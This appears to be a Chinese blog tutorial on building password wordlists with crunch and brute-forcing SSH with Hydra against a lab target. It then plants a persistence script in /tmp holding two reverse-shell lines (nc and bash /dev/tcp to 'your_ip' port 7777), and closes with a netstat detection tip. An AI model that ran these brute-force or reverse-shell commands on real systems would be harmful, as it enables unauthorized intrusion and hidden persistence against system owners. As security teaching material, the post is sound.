弱密钥以及常用爆破- 字典生成和SSH爆破

文章摘要

Bpple-GPT

弱密钥以及常用爆破- 字典生成和SSH爆破

crunch字典生成

crunch 的基本语法如下:

 crunch [最小长度] [最大长度] [字符集] [选项]

常见选项

  • -o--output: 指定输出文件。
  • -f--charset-file: 指定字符集文件。
  • -t--pattern: 使用模式生成字典。
  • -s--start: 指定起始字符串。
  • -e--end: 指定结束字符串。
  • -z--compress: 压缩输出文件(支持 gzip、bzip2、lzma)。
 #生成所有长度为 4 的数字组合
 crunch 4 4 0123456789
 #生成所有长度为 6 的大写字母和数字组合
 crunch 6 6 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
 #生成所有长度为 8 的小写字母和数字组合,并输出到文件
 crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o output.txt
 
 #使用模式生成字典
 crunch 8 8 -t @@@@,@@,@@
 
 #指定起始和结束字符串
 crunch 4 4 0123456789 -s 1234 -e 567

说明一下这个模式生成:crunch 使用 -t 或 --pattern 参数来指定模式。

@: 小写字母 (abcdefghijklmnopqrstuvwxyz)

,: 数字 (0123456789)

%: 大写字母 (ABCDEFGHIJKLMNOPQRSTUVWXYZ)

^: 符号 (!@#$%^&*()-_=+[]{}|;:,.<>?/)

77a59800a38b5ab3a6ff140ad5f41bb

**#### **

Hydra实现爆破

基本用法:

 hydra -l <username> -P <password_file> <target> <protocol>

基本参数:

-l 指定用户名 -p 指定密码 -L 指定用户字典 -P 指定密码字典 -e n null,表示尝试空密码 s same,把用户名本身当做密码进行尝试 r反向,把用户名倒叙,当做密码进行尝试 -vV 显示执行细节 -o 保存执行结果 -s 指定非默认端口 -C 指定所有格式为“user:password”的字典文件 -M 指定破解的目标文件,如果不是默认端口,后面跟上“:port”

ssh爆破及基本思路

 # -L -P 是跟着文件---脚本会自动去找相应目录下的文件
 # 如果只有一个的话,使用-l -p 小写
 hydra -L users.txt -P password.txt ssh://ip
 

比如说我这里做一个示例

大部分会做一个这个 SSH 连接的尝试次数的限制

可以使用这个-t参数来限制请求次数

image-20241129165407277

比如说我们这里成功地爆出来密码的话

  • 通过终端连接

image-20241129171151926

一般是有一个验证,输入yes进入指纹确定页面

image-20241129171254586

这样就进入这个shell界面了

  • 通过shell软件连接

image-20241129171359022

然后就是我们可以做一个这个隐藏任务

就是为了维持权限,

当靶机修改密码或关机后,我们使用爆破出来的密码就无济于事了

 cd /tmp
 vim sbx.sh

--->

     #!/bin/bash
     nc your_ip 7777 -c /bin/bash
     #!/bin/bash
     bash -i >& /dev/tcp/your_ip/7777 0>&1

保存之后,这个文件是没有这个执行权限的

 chmod +x sbx.sh
 ./sbx.sh

在主机开启监听就行:

image-20241129173008213

我们如果是被攻击方的话通过:

 netstat -antpl

是可以检查到相应外部连接和利用的

image-20241129173715019


用键盘敲击出的不只是字符,更是一段段生活的剪影、一个个心底的梦想。希望我的文字能像一束光,在您阅读的瞬间,照亮某个角落,带来一丝温暖与共鸣。

BX33661

isfp 探险家

站长

不具版权性
不具时效性

文章内容不具时效性。若文章内容有错误之处,请您批评指正。


目录

欢迎来到Bpple的站点,为您导航全站动态

65 文章数
20 分类数
44 评论数
15标签数
最近评论
bpple

bpple


一切顺利

fetain

fetain


good luck

bx

bx


good luck

热门文章

Emoji收集

2024-11-01

551
Hello Halo

2024-10-30

532
本地部署LLM

2024-08-22

511
Uptime Kuma

2024-11-29

507
241

访问统计